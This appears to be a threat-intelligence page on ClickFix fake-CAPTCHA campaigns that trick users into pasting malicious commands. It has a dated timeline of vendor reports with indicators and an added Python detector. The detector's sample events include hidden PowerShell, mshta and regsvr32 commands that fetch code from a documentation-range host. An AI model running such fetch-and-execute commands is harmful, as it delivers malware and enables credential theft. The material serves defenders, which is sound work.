Mallory

Tags: credential-stealer-activity, initial-access-method, phishing-campaign-intelligence, loader-delivery-mechanism

ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution

Updated 16d ago | First seen Feb 24, 2026 | 54 sources

A ClickFix-style malware campaign has been observed using fake CAPTCHA pages on compromised websites to trick users into manually executing malicious commands, enabling initial access while evading controls that focus on downloaded files. In the reported activity, victims are prompted to copy a PowerShell command and run it themselves; the script then downloads additional stages from attacker infrastructure (including 91.92.240.219), verifies user interaction by checking clipboard activity, and proceeds through a multi-stage infection chain. The payload is an information stealer targeting data from 25+ web browsers, cryptocurrency wallets (e.g., MetaMask), and enterprise VPN configurations, with checks for virtualized environments and security tooling prior to exfiltration.

Separately reported threat activity in the same time window includes UnsolicitedBooker targeting Central Asian telecoms with phishing-delivered backdoors (LuciDoor and MarsSnake) and APT28 running Operation MacroMaze, which uses weaponized Office documents and INCLUDEPICTURE fields pointing to webhook[.]site URLs as a tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions an evolution of ClickFix where an initial command uses nslookup and parses the response for execution, but it is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign; a malware newsletter roundup is likewise a link collection and does not add specific, corroborating details about the ClickFix CAPTCHA infostealer operation.
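Detection logic for the paste-to-run patterns this story names (hidden or encoded PowerShell with a download cradle, mshta fetching a remote file, regsvr32 loading from a URL or UNC path, cmdkey credential staging, nslookup output fed into execution), as an added example that is not from Mallory or from any of the cited reports; the record field names, rule names and sample events are assumptions constructed for the demo.

```python
"""Heuristic detector for ClickFix-style paste-to-run executions.

Scans constructed Sysmon-like process-creation records for command-line
patterns associated with ClickFix. A Windows Run-dialog command is spawned
by the user's shell, so a parent of explorer.exe raises the confidence.
Field names, rule names and sample records are assumptions for this demo.
"""
import re

# Every regex in a rule must match the command line (logical AND).
RULES = {
    "ps_hidden_or_encoded_cradle": [
        r"\bpowershell(\.exe)?\b",
        r"-w(indowstyle)?\s+h(idden)?\b|-e(c|nc|ncodedcommand)?\b",
        r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b|https?://",
    ],
    "mshta_remote_hta": [r"\bmshta(\.exe)?\b", r"https?://|\\\\"],
    "regsvr32_remote_or_unc": [r"\bregsvr32(\.exe)?\b", r"/i:\s*https?://|\\\\\S+\\"],
    "cmdkey_smb_credential_staging": [r"\bcmdkey(\.exe)?\b", r"/add:|/user:"],
    "nslookup_output_executed": [r"\bnslookup\b", r"\biex\b|invoke-expression|for\s+/f"],
}
USER_SHELLS = {"explorer.exe"}  # Win+R Run dialog launches children from here


def classify(event: dict) -> list[dict]:
    """Return one finding per matching rule for a single process-creation event."""
    cmd = event.get("cmd", "")
    parent = event.get("parent", "").lower()
    findings = []
    for name, patterns in RULES.items():
        if all(re.search(p, cmd, re.I) for p in patterns):
            findings.append({"rule": name, "parent": parent, "cmd": cmd,
                             "confidence": "high" if parent in USER_SHELLS else "medium"})
    return findings


def scan(events: list[dict]) -> list[dict]:
    """Run classify() over a batch of events and flatten the findings."""
    return [f for e in events for f in classify(e)]


# Constructed sample telemetry; 203.0.113.0/24 is a documentation address range.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (iwr http://203.0.113.10/v).Content"'},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmd": "mshta http://203.0.113.10/verify.hta"},
    {"parent": "explorer.exe", "image": "regsvr32.exe",
     "cmd": r"regsvr32 /s /i \\203.0.113.10\share\verify.dll"},
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmd": r"powershell -NoProfile -File C:\scripts\inventory.ps1"},  # benign admin script
    {"parent": "explorer.exe", "image": "notepad.exe", "cmd": r"notepad C:\notes.txt"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['confidence']}] {f['rule']}: {f['cmd']}")
```

The rules are deliberately broad (any hidden-window PowerShell that fetches from a URL fires), so tune the parent-process and confidence logic against your own baseline before alerting on them.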


EVENT TIMELINE

How this story unfolded: 32 events from the most recent confirmed update back to the earliest known activity.
May 26, 2026 (16d ago)

Cloudflare Pages-hosted ClickFix campaign delivers Lumma Stealer

Researchers reported a ClickFix-style campaign using Cloudflare Pages sites such as zipsage.pages[.]dev to impersonate an Adobe activation guide and trick users into running a PowerShell command. The infection chain fetched additional payloads from get-1o8.pages[.]dev, dropped and executed putty.exe, and showed Lumma Stealer-like network traffic to multiple .lat domains; the published indicators include URLs, domains, a file path, and an MD5 hash.

ClickFix Site Abusing Cloudflare Pages to Deliver Lumma Stealer - Malware Analysis - Malware Analysis, News and Indicators
May 8, 2026 (1mo ago)

ACSC warns of ClickFix campaign delivering Vidar Stealer

The Australian Cyber Security Centre warned organizations about an ongoing ClickFix campaign in which fake CAPTCHA or browser-verification prompts on compromised websites, particularly WordPress sites, trick users into running malicious PowerShell that installs Vidar Stealer. The advisory noted Vidar’s use of in-memory execution and dead-drop C2 discovery via public services such as Telegram bots and Steam profiles, and urged defenders to restrict PowerShell and patch WordPress components.

Australian organizations warned of Vidar Stealer malware campaign using ClickFix technique | brief | SC Media
Apr 27, 2026 (2mo ago)

CyberProof identifies ClickFix variant using cmdkey and regsvr32

CyberProof researchers reported a new ClickFix variant that uses a fake Cloudflare CAPTCHA to trick victims into pasting a command into Windows Run, but replaces PowerShell with native Windows tools cmdkey and regsvr32. The attack loads a DLL from an attacker-controlled SMB share via a UNC path, executes it filelessly, and establishes persistence through a remotely fetched scheduled task named "RunNotepadNow."

ClickFix Attack Replaces PowerShell With Cmdkey and Remote Regsvr32 Payload Delivery
Apr 9, 2026 (2mo ago)

LevelBlue details ErrTraffic v3 EtherHiding ClickFix campaign

LevelBlue SpiderLabs reported that ErrTraffic v3, a traffic distribution system advertised on cybercrime forums in early 2026, was being used in ClickFix campaigns targeting compromised WordPress sites. The campaign used a PHP must-use plugin backdoor, obfuscated JavaScript injections, and Polygon smart contracts for EtherHiding-based infrastructure retrieval to deliver Windows and macOS lures such as fake BSOD, reCAPTCHA, and Cloudflare verification pages.

Err-Hiding and Seek: How ErrTraffic v3 Leverages EtherHiding in ClickFix Campaign
Apr 1, 2026 (2mo ago)

ReliaQuest documents ClickFix intrusion using PySoxy proxying

ReliaQuest reported that in April 2026 a ClickFix intrusion from a compromised website led a user to run an obfuscated PowerShell stager that established scheduled-task persistence, deployed a lightweight in-memory PowerShell RAT, and performed domain reconnaissance. The attackers then downloaded and executed PySoxy, an open-source Python SOCKS5 proxy, over SSL on port 443 to create a redundant encrypted access path that could survive blocked outbound callbacks.

ClickFix Evolves with PySoxy Proxying | ReliaQuest Threat Research
Mar 29, 2026 (2mo ago)

Suspected Cloudflare edge compromise used for pastejacking attack

A March 2026 case study described a malicious reCAPTCHA-style prompt appearing on a static Astro website, with the author concluding the payload was injected at the Cloudflare delivery layer rather than from the origin server. The incident was characterized as a living-off-the-land pastejacking attack enabled through a compromised Cloudflare account or edge configuration.

The Phantom Edge: A Cloudflare Pastejacking Attack | Farros | by Mochammad Farros Fatchur Roji | Mar, 2026 | InfoSec Write-ups
Mar 26, 2026 (3mo ago)

Recorded Future links ClickFix clusters to Windows and macOS malware campaigns

Recorded Future’s Insikt Group reported five distinct ClickFix clusters using fake verification pages to trick victims into pasting malicious commands into Windows Run or macOS Terminal. The report linked the activity to cybercriminal operations and possible state-backed actors including APT28 and North Korea’s PurpleBravo, with payloads including NetSupport RAT, Odyssey Stealer, Lumma Stealer, and MacSync.

New ClickFix Attack Leverage Windows Run Dialog Box and macOS Terminal to Deploy Malware
Mar 24, 2026 (3mo ago)

Researchers document SmartApeSG ClickFix campaign delivering four malware families

Internet Storm Center researchers observed the SmartApeSG (also tracked as ZPHP and HANEYMANEY) ClickFix campaign active on compromised websites as recently as 2026-03-24. They documented a single infection session that sequentially delivered Remcos RAT, NetSupport RAT, StealC, and Sectop RAT via fake CAPTCHA social engineering and staged payloads over several hours.

SmartApeSG ClickFix Campaign Delivers Remcos, NetSupport RAT, StealC and Sectop RAT
Mar 13, 2026 (3mo ago)

Stormshield investigates MIMICRAT ClickFix campaign

Stormshield published an investigation into a ClickFix campaign delivering MIMICRAT, adding a new malware family to the set of payloads observed through fake verification and paste-to-run social-engineering lures. The report represents a distinct technical disclosure about ClickFix activity rather than a repeat of previously documented Lumma, NetSupport RAT, StealC, or Vidar campaigns.

Additional Analyses of the MIMICRAT ClickFix Campaign
Mar 12, 2026 (3mo ago)

Breakglass details ClickFix campaign delivering NetSupport RAT v14.10

Breakglass Intelligence analyzed a March 2026 ClickFix campaign that used fake CAPTCHA pages to trick victims into running a PowerShell command or MSI installer that deployed NetSupport RAT v14.10. The report documented delivery from applicationhost17.com, persistence via an HKCU Run key, C2 traffic to 172.94.9.4:443, per-victim tracking IDs, and rapidly rotated hosting infrastructure.

NetSupport RAT v14.10: ClickFix Campaign Deploys Commodity RAT via Fake CAPTCHA Pages - Breakglass Intelligence - Breakglass Intelligence
Mar 6, 2026 (3mo ago)

Microsoft reports ClickFix campaign spreading Lumma infostealer

Microsoft disclosed a ClickFix social-engineering campaign that used fake CAPTCHA or verification prompts to trick users into executing malicious commands, resulting in Lumma infostealer infection. The disclosure added Microsoft’s visibility into the growing abuse of ClickFix for credential and data theft.

Microsoft spots ClickFix scam spreading Lumma infostealer
Mar 1, 2026 (3mo ago)

BlackFog identifies Venom Stealer ClickFix MaaS campaign

BlackFog reported Venom Stealer as a malware-as-a-service platform using ClickFix-style lures such as fake CAPTCHA, update, SSL, and font-installation prompts on Windows and macOS. The stealer was described as persistently monitoring for newly saved Chrome credentials, bypassing Chrome protections via the CMSTPLUA COM interface, and supporting cryptocurrency wallet cracking and draining, with multiple updates observed in March 2026.

Hackers Use Venom Stealer to Turn ClickFix Lures Into Full Data Exfiltration Pipelines
Feb 23, 2026 (4mo ago)

Polish police arrest suspect tied to Phobos ransomware

Polish authorities arrested a 47-year-old man in the Małopolska region for alleged links to the Phobos ransomware operation and seized devices containing hacking tools and stolen data.

ClickFix variant updated to use nslookup in initial execution

A later update to the widely observed ClickFix technique changed the initial command so it used nslookup to retrieve content that was then parsed and executed through the Windows Run dialog social-engineering flow.

KEENADU Android malware found pre-installed in tablets

Kaspersky reported that KEENADU Android malware was being pre-installed in tablet firmware before the devices were sold to consumers, indicating supply-chain style compromise affecting Android tablets.

Jan 1, 2026 (5mo ago)

Binary Defense reports ClickFix intrusion leading to Python-based interactive access

Binary Defense published research describing a ClickFix intrusion used by an access-broker-style operator to gain initial access and transition into interactive post-compromise activity using Python-based tooling. The report adds a distinct hands-on-keyboard intrusion pattern to prior ClickFix reporting that had focused mainly on malware delivery and specific payload families.

When Access Brokers Go Interactive: ClickFixin’ to… | Binary Defense

CERT Polska warns fake CAPTCHA attacks can lead to enterprise-wide ransomware

CERT Polska published a report describing ClickFix-style fake CAPTCHA attacks as an intrusion path that can escalate from user-executed commands to ransomware capable of encrypting an entire company. The report framed the technique as an active threat beyond infostealer delivery, highlighting its potential for full organizational compromise.

ClickFix in action: how a fake CAPTCHA can encrypt an entire company | CERT Polska

Sophos links ClickFix to StealC and Qilin deployment

Sophos reported that the ClickFix social-engineering technique was being used to deploy StealC and associated activity tied to the Qilin ransomware operation. This added a ransomware-linked deployment chain to the growing set of malware families observed using fake CAPTCHA and paste-to-run lures.

I am not a robot: ClickFix used to deploy StealC and Qilin | SOPHOS

Researchers identify updated ClickFix infostealer campaign

In early 2026, researchers identified a ClickFix-style campaign using fake CAPTCHA pages on compromised websites to trick users into manually running malicious PowerShell, leading to a multi-stage infostealer infection chain.

Dec 1, 2025 (6mo ago)

Rapid7 links 250+ compromised WordPress sites to ClickFix infostealer campaign

Rapid7 reported a large-scale campaign in which attackers compromised more than 250 legitimate WordPress websites across at least 12 countries and used fake Cloudflare CAPTCHA prompts to trick visitors into executing ClickFix-style commands. The operation, active in its current form since at least December 2025, delivered infostealers targeting credentials, cookies, and cryptocurrency wallets, and Rapid7 said it notified US authorities to aid investigation and remediation.

Crooks compromise WordPress sites, spread infostealers

ARKANIX STEALER observed in the wild

Researchers reported the ARKANIX STEALER infostealer family as active in late 2025, primarily distributed through Discord communities and underground forums while posing as legitimate utilities.

Jul 11, 2025 (11mo ago)

Splunk publishes ClickFix analysis and releases ClickGrab and PasteEater

Splunk published an analysis of Fake CAPTCHA/ClickFix campaigns describing clipboard hijacking, fake reCAPTCHA lures, and hidden PowerShell execution patterns used to deliver malware. The company also introduced two defensive tools, ClickGrab for infrastructure and IOC analysis and PasteEater for detecting suspicious browser-origin clipboard content on Windows.

Beyond The Click: Unveiling Fake CAPTCHA Campaigns | Splunk
Jul 1, 2025 (1y ago)

ClickFix targeted restaurant reservation systems

An earlier ClickFix campaign targeted restaurant reservation systems, establishing a precursor to later fake-CAPTCHA social-engineering activity. The reporting places this activity in July 2025.

Jun 5, 2025 (1y ago)

Rewterz reports ClickFix-style pages delivering NetSupport RAT

Rewterz published a threat advisory on a campaign using spoofed verification pages to trick users into executing malicious actions that result in NetSupport RAT infection. The advisory included active indicators of compromise, adding technical detection details for this NetSupport-linked ClickFix activity.

NetSupport RAT Delivered Through Spoofed Verification Pages - Active IOCs - Rewterz
May 30, 2025 (1y ago)

Fake CAPTCHA campaign reported delivering EDDIESTEALER

Cyber Security News reported a ClickFix-style fake CAPTCHA campaign delivering EDDIESTEALER, a Rust-based infostealer. The report adds a new malware family to the set of payloads observed using paste-to-run social-engineering lures.

New Rust-based InfoStealer via Fake CAPTCHA Delivers EDDIESTEALER - Cyber Security News
May 18, 2025 (1y ago)

APT36-linked ClickFix campaign reported targeting Linux systems

A LinuxSecurity report said ClickFix attacks had expanded to target Linux systems, marking a notable shift beyond the predominantly Windows-focused campaigns previously documented. The report associated this Linux-targeting activity with APT36, adding an attribution and platform-expansion development to the ClickFix story.

APT36: ClickFix Campaign Targets Linux Systems - Evolving Threat Landscape
May 1, 2025 (1y ago)

NCC Group documents May 2025 ClickFix attack delivering Lumma Stealer

NCC Group reported that in May 2025 a user was redirected from astapowerproject[.]net through malicious sites to a fake CAPTCHA page using the ClickFix technique, leading the victim to run PowerShell via Windows Run. The intrusion delivered Lumma C2 Stealer along with additional payloads, used mshta.exe and obfuscated PowerShell, targeted Chrome and Edge credential stores, and communicated with infrastructure including blameaowi[.]run.

Fake CAPTCHA Attack Leads to Lumma Malware | NCC Group
Apr 29, 2025 (1y ago)

Kroll details rapid evolution of ClearFake delivery chain

Kroll published research on the CLEARFAKE threat cluster, describing how its delivery mechanisms had evolved into a ClickFix-style fake verification workflow used to socially engineer users into executing malicious commands. The report added technical detail on the development of ClearFake as a distinct malware delivery framework prior to the later Web3-enabled variant documented by Sekoia.

The Rapid Evolution of CLEARFAKE Delivery
Dec 31, 2024 (1y ago)

ClickFix technique becomes globally widespread

Traficom states that the ClickFix social-engineering technique, first observed in late 2023, became significantly more widespread worldwide by the end of 2024. The technique tricks users into pasting attacker-supplied commands into Windows Run or similar interfaces, enabling malware execution.

Malware can be activated unnoticed using the ClickFix technique - Learn about the phenomenon and protect yourself | Traficom
Dec 1, 2024 (2y ago)

Sekoia documents Web3-enabled ClearFake ClickFix variant

Sekoia reported that from December 2024 through February 2025, an evolved ClearFake framework used compromised websites, fake Cloudflare Turnstile and reCAPTCHA prompts, and Binance Smart Chain-hosted components to trick users into executing malicious PowerShell. The campaign dynamically assembled infection chains using blockchain-stored configuration and delivered malware including Emmenhtal Loader v2, Lumma Stealer, and Vidar Stealer, with more than 9,300 compromised websites identified by 2025-02-24.

ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery - Sekoia.io Blog
Sep 13, 2024 (2y ago)

John Hammond publishes fake reCAPTCHA ClickFix proof of concept

John Hammond published a write-up and GitHub repository demonstrating a fake 'Verify you are human' or reCAPTCHA lure that preloads a malicious command into the clipboard and instructs users to open Windows Run and paste it. The proof of concept recreated a technique reportedly seen in the wild in August and September 2024 and included standalone HTML and HTA examples showing local command execution.

GitHub - JohnHammond/recaptcha-phish: Phishing with a fake reCAPTCHA · GitHub
May 8, 2023 (3y ago)

Censys documents ClickFix campaign delivering XWorm V5.6

A Censys report described a ClickFix web-delivered malware campaign that used a five-stage infection chain to deliver XWorm V5.6. The report highlighted HTTP body hunting as the technique-based method used to identify and investigate the activity.

Cutting Through the Noise: A Technique-Based Approach to Hunting Web-Delivered Malware - Infosec.Pub